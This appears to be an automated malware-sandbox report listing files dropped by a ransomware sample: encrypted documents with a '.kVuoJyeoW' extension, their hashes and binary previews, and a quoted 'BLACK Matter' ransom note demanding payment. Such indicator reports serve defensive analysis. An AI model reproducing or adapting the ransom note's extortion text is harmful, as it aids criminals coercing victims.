              Preview: _..I............Sp.....h.E9_..=....CC............VqOrU...x.....:'E9 .....|.v.8.M.O2..b#..^v.6E?.|#.8.b..........-........+.1.C3.!`F...zD.Eb.U......*.k.....%2...9.x.gw.x.Zz.....0.O.il..Y..$..{##C.....y..WX.|."..\.D[.......M..j..biMh.....FRix....._..*....uv......&.L.&....BN.B......[!7....s..Y....$.....LT?.n.HD'k.).h..=.\.Y.|,...3..!.....w.o.I...&....w.Z........`.g...{r....~<ux..e.v.K.....I.N......Jcw8.K>".n.1..#...{.?.....H.<'.\*&.9..2.~.B<..kwU'Ge..]Sy........c......s..$R&:..Z.2..`..\.....d.c....R.....>#}y...."h.....N._h.KC2.N.v.1.E$F....#..s.~.y.%[..........;..l+..^..P..=.}...Jb.4f..vr%M..Hw.rh....,8.H}O...a\3.. ..8.bRk......H..h..Epr.....x.-..O....8.s......5./#me$..y_3.<qB.o...<....e.....s..{.;.d.#.^~.<....Si..H:f.xc..]s.+:.?$..\..%5F..P(B....aC?[......uGq...2.w.....f"vq.^.Z..K5.I.v....b.\..G.(s....].N.d(o...F.....O:..k$}.R.?...w..8...H.(..%..7...y..q...U],d`.#.p..{`@[..a......W...H....F^...yht/....IB...bk.T...^=.9I..t_...vG...{#.
              C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.824082896642838
              Encrypted:false
              SSDEEP:24:B8v53evHilduKM46skcFIUk+De/by9+olpg0wQ9zdWYI:BUuvHiX00ZjDeDy9vvVYYI
              MD5:AD88C391D0D8C5272A977B11E6CDB8C1
              SHA1:5C23788FE39F683490F0EAA24105E5F9606D8491
              SHA-256:54ACC8B609211F6555474F661F0BE49DE77691E8E681E6F90678829EF8D3D6D5
              SHA-512:ABB5EE3C18372AB3F6C97A200997258BC5B6356AB5D1B23E5AA28A4239AE5FC40B4588971BCC483CD2626DA8356A3517FF3AABDE0176795F3D589F4F0BA76F8E
              Malicious:false
              Preview: $..q.......w.^.......DAe.g....._..&.d.....t7.%....i.y..AR...6ZL..;i.x"...Y<..u+2u.bEFQz.rw.B.Z..ob...6..w........%..K..7.~...T.O0.....G.zh.W%GS..w..@....a...%.....N..=.._l.5..(..G..I\...m....u"..Z.U*lJ.].@N.....>.J.v..e.....<RK....$.Ky.<..t..#..w7*.....X...p.^.U.e.x..U...............ztmA.V].k..z.._..K...e..a?...kN.8....@.c:.s..@...u....?&.....Ztx.I..D^E......a..._=e....uS...d....i.&.1....!._.m..I*]J........ .L3n......5.-..I...i...../U.c@.....].v..........\...I...._3.>..-......V.s.-`.L.m...j=`J*..>...?]..}.F...;^w..%.i... ..D.dv...>.[.13....H(-...).]x....I.#Roa`. ~....+r..Y........c..\.jh...L.egV.."..8...tFB..j.&..-..L...kQ....t@..|.9.Z{...k.....\.....!3^.F_@@...f..@*....#...'.3.......s.,....:.;...g...J_....v.....q.... ..@-?.I..x...+`.M.>.c.T..(.S.../......d...o......8.....s.W.#.....Ah ..a]|!.........;;.......LA....a.z...,.%.J..&}/..|...g.-.p9.v..,....X...ux:..p.F.yl.........p....tc..`...f...V{U......GN..6n....O,.........L.V.U.../0Z$c.
              C:\Users\user\Documents\ZQIXMVQGAH\SUAVTZKNFL.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.801161831460351
              Encrypted:false
              SSDEEP:24:sbr8KxgbZmMkXMsnZjvT4+vNgOMOoPE9Xf/xNDcsGfMV:m8KxQZmlXMsBvT4+vNgCHf/7GfMV
              MD5:58DBD277DD98EA8FF98D6AF8837C79A0
              SHA1:DB79F3F6AC6286CC27393A4D4CB3E1AF2E1F133B
              SHA-256:464D93803DD0FA8241A1542E9E90DA80679DD160FA359F3D085424C809FC9ABD
              SHA-512:DDB4C62D431FB31B7E8874D6489442277D50CADD7254106D44F3D631FF8FF7A4D3DA1CF21303C984D7E2D3FE28537F7DF0933B1DBDC10D90051C233B080389C3
              Malicious:false
              Preview: b$d+.6...i..s....zT.....6.>..u....c..JH...'...!....N..k.o^./.z.x@~...f.qc.ZES.[....j,...-.I...~h...y.R.......HH...v.gg.N.:.....T.z...~.g\...F..z....M..\.>....2.a..A41Lv....~b.M.....I.,...>V.I..B.TQ#.>.....D..7..[.~...*{...).;$...0..k...D....y.H........l>...58#.5..._..N....L$hN.....7....kH..xd.U..LB.C...X:,...!Q..... .....^L..0.^b.Q...i...%...}.:.z4,..g.._Byb]..,.41.u..&/z!......^.0&.V....{A(...c9..z.}.0.*.e..-uu..SA...H..t.....F.*..a.p.%..]Q.e.....d.....13y......cQDj.Z.....u..C~....<...8oK...{.i.<#...P$H..l...*..}..p..N..m..x....V.r.W.b.V.....Z.:..`/70.]......h..@a.@.T.H.20..U...h.O...^.k.5. .z.^..(QI.. H..:.~./D...uI...vF4..G...d.=2...35%g0..`o...R..ui.4.%c.c....u.?.Z2..!4.<$C\.....*B.._...K.F4W.='{..;g.hy,._i.r6.b....$<.5=.....[....N.'.Wj.....`....P..*...p..Yh....x.....GQ..N...bE....j..ZK.D;V.g>...qwG'....(..X.b...X.F..2.$..k.......(n,..tU.]..^.U'.P...........P.*...H.Y .*......:..0.q.......X...m...6.....Jo|q.+LU.7.....^..y.2.D&..H..&....z.
              C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.799685094906669
              Encrypted:false
              SSDEEP:24:QjYx3OdT+OJoiDMoQVr1gGnXRJuaAaGg2IDLx5kIou1E4uQHnSZ9k:VOdT+OJoigjVpNJBAa0IoU1DyZ9k
              MD5:A90FDA342677E09D587836F1E6FCE7E7
              SHA1:BFE68B06F4FE04151284D464DDC37047E60B01EE
              SHA-256:9D8B823FFE11CBF67966C9831C08C3CF1BB12BB139CC0665F3A137ED6A36AA06
              SHA-512:7007B2F58E91CD6A17792F511806F8627345FCA1A75F2133D97CF58E6E36581E76198DC414336E8323D7AD767C328686B52A38688DD32F98EF82C6CBB5550C17
              Malicious:false
              Preview: .u.....r.vn.V.5..k.......J....5.^..ri....Z$..C.Q+........qD..c5.H...S7..k..x.%./..q...V..).....MH.-.kmg,....1....e..[..6>.H7....~0.B^.%wp!.g...D.....<o.F..E..-...55..5{.Rd...p(.-....p..y......x.....B..HH.s....../o..%.).m..R.. k....A|.\.c...1 .T.PM...Z..yh0A!...9..O......<..)..Lk...I.i.d.*>.....*.J),.c...$.c#...5.:<._7^y..o..t.Q...M.b.~..H)......M...k.:+4_....H.j.....%z-kac...[o......'..o..,._i<E....<..@..oW...R......,{..h......1NJk.7@.y.h.v.i.U...0...ih....k>.#....f.../R....,....y..w.x....I.+}...i.Rp3.$..l...wT.'h..t0.V......g...s...5(.?..E...*.5M.<...B_...'..E.A...E....T.....n..{.H........)6,}..w..$Q.i)......v.4?10.0'.h....w[.b...!.0O.:[I.wP.f-......Q.\l....P...]...!fQ^J.....8........4r...h.N8Ms..U.~.b..Y....$'tk.....$.....8...B......)z.;]..,.......!...w&E..Y_......|4&a5'0.;.../6.......n t...k..Z..]eI..CF.O...'3$..N.d..;,......'s1....H;Y.....M..,.m.#.\F..7M.R..b_.c....:7.~....6... ...g.|SJ..u...%Z...:.a.Qv.{..u-...*w..J..J....rf.....u....$T.h:
              C:\Users\user\Documents\ZQIXMVQGAH\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Documents\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Downloads\BNAGMGSPLO.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.847004388575243
              Encrypted:false
              SSDEEP:24:+pBt7nsEQe9idwtBox3DukgD3cQgcjXTndSHvHU5pqD8puiJ6id:+p38yiGTc3CkscUXoP0zqD8YY
              MD5:1E95C73F07DEDAE456A7CF01591874F3
              SHA1:22FE8792BD3FE9DB84CBD1D036E238D6ABD7B371
              SHA-256:71AD0CE1ED463C887B75FCD1FBB826097BDC84E03402396A7F50921AC893141F
              SHA-512:3BE176E80E9483F194CB1158D2937E31DC1D1A14FB8BEDAB4AE3153B51BC5A906914BEF2BBC2250094EA0BE8FA7F14AA1F4B3FB99DD51E50EE8D17E7AB407568
              Malicious:false
              Preview: ..c.>#G.......|.jOUk_.C?....&.......!.m|....n.....c.j.W..n.....E.Y...;.K..5.....8...o.K...w....D....#;....k.;..h..y..%gtu..r...)P..^..sp..c..#..{..M...6..(..4F..|..._.....#....{.np.#.-b.....?....1@..M!....m.|....Y|L.Y..&.[=P...W .s1...]F.....1.....-.K.^..yE$.(...d..r.2H.6.TD\%|.:.c.......q...=j.m.(T.D[....\.....E......p$...Y"A..e..m.4.v.x#].....<%.=.: ....{....I..Q......x..A......2Y..wh...\..tW"._"......s4l.s........ ...9....m.?.4.6..<2...iF@*U'..:........-.|...s|........en...qLb.?..p.Z.=.P...#<..4.o.Ek~y..)....P...D........1.H...e.3.J'.z.!..~...8F..E!...j..[.,. w....Y....I..k.A..I.s...y..3/....t;.....[IZ_B.UQPD....>..O.b..T.K.n...O..Y.j.O]..On....J.+.C|Cj.YKx..[\|Q_...65.X.`.C-.A...V`N...,.......t[...k...!.R^{qV`.Y5....O.K...+.H..[^.3..N....?. .&.N...*...F..&...o.0..}..9........y.f.r...?...,.....`.v.Cl.^...u...aM..90Qi..UW.M.\.2.....v......}.&...F@..b..i.1H..$.%.A...X...".[..A........$.F.....%.m}.+.J.qU...K2{;..|...5ID/......uetz
              C:\Users\user\Downloads\BNAGMGSPLO.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.837048133569837
              Encrypted:false
              SSDEEP:24:6ryvbTWbLg51DeGbHnMNp4BRvZOxN/j5PEZbmrUMgdcX+q4oNvmi:6rsObLg51DrCSBRMx7PEp1cOq7Nui
              MD5:6A05B4EDAAF991DF96E19876CD3DDC32
              SHA1:7952EF415B48899B7B585301CE73DD2C06449734
              SHA-256:E4D7970769F73A8F89918E9A4C1D72B0EC23553CF7CA90113F9B803976E536AF
              SHA-512:D8B3B83AA14FD70F8F804D5ED3AED2D9CD8B47AC22A109C331E8546AA666684CF99279E800C720A4AF3355BB24FE6383247690465D5AB4B81D492C94C84376CB
              Malicious:false
              Preview: .d\".....h.w}...R..oUb)3...t..i... ..Gf.`Z....w8*..Q...T........}..0<..5~.~Jd..O....Ylay...'...OTv..R..L.S......#..vE.8hRA.~.DY.:.K..c$.v..6.x.#..c.C.B...}][.lKuc x....@....{6.0S...|..i0........G..aI.|....Rok....a..u...Q.......f.M-./.ww..C........}...U...Z&....f...%J..}3.:. .ui6..n.......p..SA.8.".&.......293...q.y.q.p..t..P.z.2...s...{..*KR.n...<oi..h...8....q...<9L.T.}..+-^.&o....k.t....-.IH.t<...m..O..Z.kG.0g.,.........ue...E7:M.....sM.P.-........,g.5...V`R...8}.....3....w0..3.2`........`.5..v ......Ow.?.9.Tu...&y$,..'..y.N|ol>.D=`.`H...b.?.U..7.5j.r............Xh.'.^4.;.YSU#...'"5\.3I.2C&..d.@c....{.....Q...*..5.....]..gl.....Zm...+F.DW.K......]....4C.g.;...NS.. G........H.......9...-.N..Z4@Z.S...b...V..(.L..j.;1z...L........Q..N..}R$b.<4..|.F........U....T..^.U.=....\.......2.Dyy0..teP.$..pq....O+.T......K.tA\Q."...fD.&.@*.Vl...<..@.&].OV;fQ.=..?..&..k....}.T.m...o.......i*..lFX....(...J....M.*0....8.../.>f\...<..X..3..K.......g}.DJ...d>.~.
              C:\Users\user\Downloads\DUUDTUBZFW.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8289977574428935
              Encrypted:false
              SSDEEP:24:hTxtuYOARJG6VCvsysQu6ywb1HAG4R3CZD0nimCCW8n7J4vTjxs+s+s0:5urAGQ2fywb+G4BCZQNCg14LF40
              MD5:1D3F06EDC871E6C99E983C92E6DFB2C4
              SHA1:2E733CE0666FC05957736A493466AF1879309FD3
              SHA-256:53D024AA6251A5F87EB565471A6F2CED391A05891FB5055A8B3ED6730EDE25D1
              SHA-512:720D83E4B327C6565D8FBE6A777B0F097A76C03908A0591C2EB03EB207B72FAA4FD6564DCFF75A75DE068CD8B8095DC3C5DAAC6D3712A29981ABC905C3E25F26
              Malicious:false
              Preview: 8._.....C...u..... d0....d........\...zE;V.[._.c.....o..h.........U.zp.~.=.F-...0.Cc7..L.....Hh)T..H.......[....i..5.N....3.U'.7"UB=n.{..uh..z..T..@tg..&.-CS..lN...g6!R}\3.E....KW..a..QN...u.ai.)p7f.. .....@T..`....&h..Op1w...Q``...9.y...........S..PL.._><2.4.d.}O...I.. o.!hh.z.q8.Q....r....F#..N.?..K.7."../y@...`..v?.....im>...v.".E....AYOT^.eL.F4..x.....w..'.F..N..r....L....=.........<.U_Y+.;....7N.fksJ....L.........(0..].e.D}.h..Y..r....d.../p...%.....Q.<..&Y...a*1Y..\/l.Sm.r.\..Q.....A...0......%!.mi...}4].6.I.#.hg.1.bv.R;w.i..0`.}...7#......jt..N.....$K..y..{..J...m..r.M....*.*...p0....4/....Q.-O......w.3iO#a.....ZX.l......U.K...7.p .a...9S."g......p#.u...?<..WS.....v.$..*....8.J..Y.i .wr.c...l..N..(~.,......-E.......M..=....W...{h.|u....L......v\.4K.W7.|0i?9U:J[..2..T....Y.e....Y.....C...6......M#<..g.r.Iz+a-..aZ...........,..b...9..a.....K.wqF..t.Q....$O.A*"..f....D.2(42......2=.{.............+\.f......Yg,.+X..&.n.....}.\...'P
              C:\Users\user\Downloads\EEGWXUHVUG.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.830672163225584
              Encrypted:false
              SSDEEP:24:98T87zIhUOMyl0XzIy59q6dl/75gAKezdKcexf1dqb8:9847zIKOMyuIUEidgAKukbob8
              MD5:5B0655262013E454A07CC886994A2A5D
              SHA1:F1E30213156F27AFC6E18AD9D4032F73267FDF68
              SHA-256:94732211DADFC65E35299BC340BA39DED2A1768C5C33183876864788D6E47F23
              SHA-512:9542C034B9B592CEA9F538AED1A6E5173D37C7D2C33F3A324E6C80DC35B24F9B80989F34479F042F598B050BEB23688C7CC29C7D623A6D7B5C1FBB2BFCF09C21
              Malicious:false
              Preview: ..y..W./c.s2l.......>.X..5JM...f...f....p...<....Wm}Ev..8.*.j...f.Eg.w....eCh$...eg;...=b...pK..dsW..8G0.....3.`a...2.3?..G....x9PeG.|.&.1$D....83#=h.....i.:.eo+,.....z....m.T..O'........,.[*.O'^.x....t.H^.......K#..&#s.....=I........l..].%i..#...y7T....p.?]..B..!...|t*....Ng...<`M.~K.=W.J..e...|..B...6......\...78._.=V'.u...q...L.+...Eq..La.Cq.E.Y...b...!...,...;L#O!..pM....'...weO.Ve^.v.V.>.U.J.<...b.h........B......@mU...9h.Fc...L.J...H...7..HjPj..:.-o.Y...Z.[....a........C...#.M.A.......[U..Q....P.{...D."C&J......u.Z..m...RBp....%Db.o.$.{{6p.k.s...iE9j...[...&....F>.h.(.....&...<..H.._.K.h(.Q.&{{.l....C...4.....>.A....P...[Q.o..[l.V..=...7...V....i{7?...o..&.(.o....%U..j..J. . .)..z.c..z..h.k..4....."..x....k..vu.0.Y.....x.6.~.S.W..s8..I.d...t!.>.R<.5...,..?v&......&.p.n.....40..0en...u4.G.....#f..{C>..L.Fe'H.r..Ly..?..aK..O.SRT..1..^.lVV..T...?2....`..80....(.....Q;.,....0.p...vE|...]v..V%.y..k...u.R.C.F.u..C/.Z.6B.....R.J..%c>
              C:\Users\user\Downloads\EFOYFBOLXA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:PGP\011Secret Sub-key -
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.845199095696841
              Encrypted:false
              SSDEEP:24:MM/SqBtOO3TOJBumI1hL9hTuhvWAU/mPVF95Qw5FEC9z78Aqh+xfOH:MM//d38I19rTuIAUulKw5FpEYFO
              MD5:E652266CF6FEF7AE7EFE21785F0442C2
              SHA1:933060B7CE03E9263BA11EDC80E18C0C8B320823
              SHA-256:933C8A62F3091B5FCA37D2370FF890AA151D8C78031F436BEAC5F5669A283624
              SHA-512:F2492FF22AE8E57D55340254CBC5533974CE4C9B9F5F056876E9ADA90086444CCA43ED65330D66888BD159D6512A04D5F93366C95F700080D0180CD8327FC568
              Malicious:false
              Preview: ..oM.eR....r..V....:..3.qc..|B.=.)~..t...2.....j....g.]...Kp..zn..f.Aeg..v...".3wc..q.\.}B.^..........72..('1\...v>.k..@.Kz.D.....e."..n.7`............bVn..f.5Z..%d*_k.9...i|.a.G..mb.b.$.. .x.d*..i...7.q...m.,w..#w......Y`v^.._...1QC?.p.....>..K.q[..9..).4...T%.F..nO...=,Y.....n#..811>..P.V.s<..zs.z..#.?..$.T./{kC.'R.........c./.Fd..3..0...~.u...e.<M1..D...[3.....>`jh0..e...=h..l!...Y4..7.....q..j..BW!v.{......,.B.;...[.&7^....b.-..B...[.(.~,.P...sUt....Ik..M.g.-.2.f..y.]I;.X../. RG....tvf.,....Le..i.p.....)..m......n...8D..}...c..F..!H..x.?}.....>\...O.?.B.tP1....9......../...w.<.G...dp.9....Wf.*.~....;...<...ze...b...V.Fa.../.J4.[\h..z..X.8A.....{.`.W....]..;.Q.mK..b....Z...'..i...*$/o.pV....!..Q'..r.;.&y...&..b.b...0}.........B....8..m.%n:%.a~..,.n..U....,.5l7.5..%..N.@.7...A.V.UI.)U....F..x5...)66}.L..xM".....)o.c..?...K.8..z.a.....;...._.....&.DqL.G..d.....x...&....4....4........z.!k..c-.,....Wn.r."&..)a<..l4'q..n....o.....r.i...s..f..
              C:\Users\user\Downloads\EFOYFBOLXA.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:370 sysV executable not stripped
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.836052844476827
              Encrypted:false
              SSDEEP:24:4AsvxM0bTZ+X2/qSLMnQFn+ubb/3PHXcGPsXbms1F3rNceJ3/o9Z1iEmKjIAD:lEy0bg2NgdGb/3PXB0Ss7rvPo97ihQIM
              MD5:A6E465A397EAA1E6CE72CF9036EA701E
              SHA1:3C9F0C82E4B868B2D559EAE72F21DF760C7F5E4F
              SHA-256:6C5F41A8A76DF8A39A7941657E5F5176A924280C770012907C636177CFC1EA23
              SHA-512:03904D881246932C895938E89FDBF6BE790E5A12595E8905C3048F1C211FB2A9EB50CAF108857900B826103A42B69926EAA1C63F569DF8AF1EBBD5666BA2CA52
              Malicious:false
              Preview: ].6.a6.....D9..6t.........&...s.G...H.[@...DL........./.QZ9.X..H..h./.U.}l.m...^.X....s..Z..<.hZ.........T9@~..K.^....e.O...... \.s...vF.7q..[.......j...T.-.....\....[...]....%d..Z.1`..4#R.@..P..9.....kp..t..rl..z?...J..L....j.p=5.b..Y....i.C-|,..x.kv...].*.^.5.`....:.dv.>X....lai./.vP..d.l...-.P(.s..`.X.a#.W........$K$...RS.s8.".~.......!...|g,.X..'.G....0..n.!.z.&......y......RI...-...#?..Y.7..R:.R..s.......261_^..D.......;D..L7IZ....:....L...y.9.:@.7..K.ub.f.!....S.........pM...n.~.D3.M...U-.MLq.)gXE...x.I.....G....7=.......]8u..'...&{...=O...J. Z..y.S..>..6..2.+(q.<.F.I.]_...4..X...s\P.........iZ..f...8@.0_ewk..Rs...e.W.....Y]*......a.A:$....X.........%.H....u...J.&.P,.M.!..`.E..{M...I.<1.%V.........@H..n}<...1....oC0....5....^.k.......g..f.S......J.........*!.h....Y..B...}.i....c.Q...[.x..\f.....I.;.J...^..V.Ba.=r..[R$.[..O.......D.t..hmU....^.XPU@..k^....|._.U.6.6....Xk[\y.C"R.aY..s.Z....];D....Y..Xb..'.......{.^...8.S.>&...w..
              C:\Users\user\Downloads\EFOYFBOLXA.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.800762740820326
              Encrypted:false
              SSDEEP:24:0XZMqN3o3h+EP7PMXSZjaZqZif2OOWfqfPy:0XVY0mPFvOOWCHy
              MD5:C519AC33FAABF16E79650E1AEFF5C258
              SHA1:67473E1C3C633EB66BF6A4A484AA8C2B047268A5
              SHA-256:D9D5B0596D977C9A29D87291CEDB3FA4AFE1A6B1CE17DB08144F38F672196A0D
              SHA-512:F1C1AF59A47A97717726276699F0C544F622B72018B2DEF5D339207AC157D609F3FC00FFF7FB3AED4B1BA4ECEBE4EBD82F8EEBC035CC32D8C758F2A8ABB87B56
              Malicious:false
              Preview: N.....)...h~*.0*EN.K-.....).....c=.G.C.~.:..yvF..G.F#Y.......XHB6L.QE.`..0.........r..:.F.q.v.2..z......2r..T.. ..^A.m%'3.vU\.b..).............=.....0B.z'..m|.st.[K.@...-.v.j8..g..V...?B..c\.=.9.....8-....la...A[...n.hfE.....oU...........h&..(.5E<?.9.....Mx.;;Uu...Pb......2....J7.|+0j^%hb.7...s...l{x?..E2m;..d....$x....zM).s...7..3../.....s]%&.F.C{...&!.....F....Q.K.Y.L~.<._.uy.o...s..).^D....:.Ap?LL.rY...].......:.1)....5.;..2.$.r...9.....E.._.S...B..:....98*.*.~........j&.JA'.X.v..A........;N.r.8...^ .4(&...G....Y...g.N}.}...W.#.zp..]....p...../;...}..."...2yQ.b...._]........}-.Y.G..y........VV...Db........V'.........S^....*.V...0..{....O\......B.....g_..".K.8..i..G....P.*.....W]H..%..,..)Fv.5..Z.,...... rW...S.......jlnm/.;j....L.3..'..C....A.../;]..].tU.^.V.[a.e.....l.:8...1,...gn..2Uq5...........Cy..^..5....<z8.If..J.....K...TS.......>.H3(X.....3...+...._t..r..)/..T..~...P."..\.#t.5Y..;._.w.V.......D.L..x.......yFM...IH.....d@....'..:V.
              C:\Users\user\Downloads\EWZCVGNOWT.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.841733570869459
              Encrypted:false
              SSDEEP:24:dssTvreNJ/eedycWAxjrpNnJNQnJrP/i4i8Pv1VpwOl:RPUbd3WAxjrrJNQnJry4Zry4
              MD5:671219D8BBB0C9D62E39A049F7958AAD
              SHA1:55D70200A210FE75EB176B5F98C3FD2732CEAFF5
              SHA-256:10DBB43A516FC56295F59BD779DF395847344912F6C421BD44C33C0CD419E1E1
              SHA-512:40C8503F92C9FDCFF5E0F3FABBF5B9D9A34FDBC40A0D6974F62FF6B95C1B96B5273D213C7BEB34BF0335F1679F04AE8EA2B2D6A6C0755E604CE6B9960E110238
              Malicious:false
              Preview: .....zv.c...|.6.......I.I3#..5.rd.&..S.Y.B..|.M.a.1X..3v....~....d..S..h.....4}.....y............WC..H.j..c.>......y.....qD. (`._{z....^W.J"..G...SQ...n...{3.O...@1&....*.wL$n..D..#..C...rA.&.4a..[.n.[.m.{.._I..p...*T.....5D.}lF..........i.....c...."......y.)m....;' .V...B..<.J._.......q....'Ap.a.X..L..N8'M.}..N..):......R..s..{...j..g}...+P.B...\."5R...H..cm.N._..E.2....@%..Q.Y..".. .V.=..T...OJ.IT..?.......d.q.Ut.v.Ul.Py...z0..f..0........?_..l.o..',.p@]....C.J...S...@..z...5nc..S:.v.....o.!.`.&...U!..?.Pf%....f.........Sux=P..R.R...s..o...q+.....Ba..e). O.GY..L..[.M....;~.$m..@}.B...V...|O.9........:kQ..0..DN.#6....8..oE...*B.....<..b.J#......<..[._.,B..j..O........V..M....*..l[.C..(.g..YG}?.q/.(.T.9s.'-a..y..E2W...V8.W.Q.).....ju)..+..`T....... ...m~{.:.....'C...93/........i.kG.A(+.d..b>...h....k{c...P....#....`....~z..e.&b......m.J.L.J@.Qx...to.......v.l/.C....$..B.R.=.`".Vv.......G.........P.o%..kZ.85.z..*.....%O.W....<]h...y. Nq1.X.sl.
              C:\Users\user\Downloads\GAOBCVIQIJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.809184118172027
              Encrypted:false
              SSDEEP:24:6aE73ocFR+7VqcQUoHDNmXh4wphgRdhMLkjhIYkDMf43Sj:w73WoWoZmXh4MhgRdlNIYIg
              MD5:1F6BF2437C7046D961D4C396D515E3FE
              SHA1:63B71C44A641743F8742A76F4722423CC13BDC57
              SHA-256:FF10EC723063838625686D061070BA8AE672196314AA57E2A15FCD8579101BBC
              SHA-512:98A2C7D17DC094FABB83CE272C0C552B3DFAD4A8FEC23BFFECCC8BFCEF5AABB9B2E459CE94770C359A168928EAD10E45FB7EB6DBE6CE8E01DF96248B2E4FC624
              Malicious:false
              Preview: $O....[....y.M(.v.Y.wg..|.#../^..G.k...,O.Z.k..R..&.|..U..../..y!.e........T.....G.J.KG...G,..w.Bz.n........$.....i.....hq..=l......c.^.f..K..%.@.!t,y.)..'...jU...x..w...........jgw>M*.`.....?...........$..R..E.A6|.t...E.}..L..g;hy..`Z.......5/+g.<..C.1...X.Suz:B.1........R94.\....N....[.&..."...N_.$...........B...o.J.A).:.u9......W..*.w^..U.~..n..."...6...[.K..|-...?-...^-..n..eNs...........b%.[....(Yr...MD.m.k>.....K3um.W*..../1..KE.R.656.?..jx....F...4.N.0..Rmg......,....U.K...B.3.O......3Q....../avN.A..1..YM.../....^.3j6\.d..h.u...)/...g.W.._..T,...&.u.W.'....$..[...B1.?^........'\|...5.I..+... ..>...~....L.4W\_.<. .[c~.,n'.V.w.Bt..Q....y.p.GgU..d....>......1..HRj..H...Q+.j....M..WG.y.....?....H.Y= ...Kpf...RMH.@..9.....&y.2T*....q.g..,..4...By."..$.........&...M.....gJ.l..C....Y..'X.5.S..?*R}^.W`.[a...j.>h...4I.).X.X..^...}.....B....L,.:..%D..f.p{..>-F\....T...........v.S..Hh.....S-.o.f.}...}..:...R+.(.J.?....A.(........:S.;..J[...v..P.W
              C:\Users\user\Downloads\GAOBCVIQIJ.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.839592328373525
              Encrypted:false
              SSDEEP:24:3O4GLNtgmhdPe6t99eatuB/0MxdAI+p0qID27LiFdKy/7egB7+/U0c/xPQ:+4GhdG6tcB/YI+pQDwLiFoyDetVc5PQ
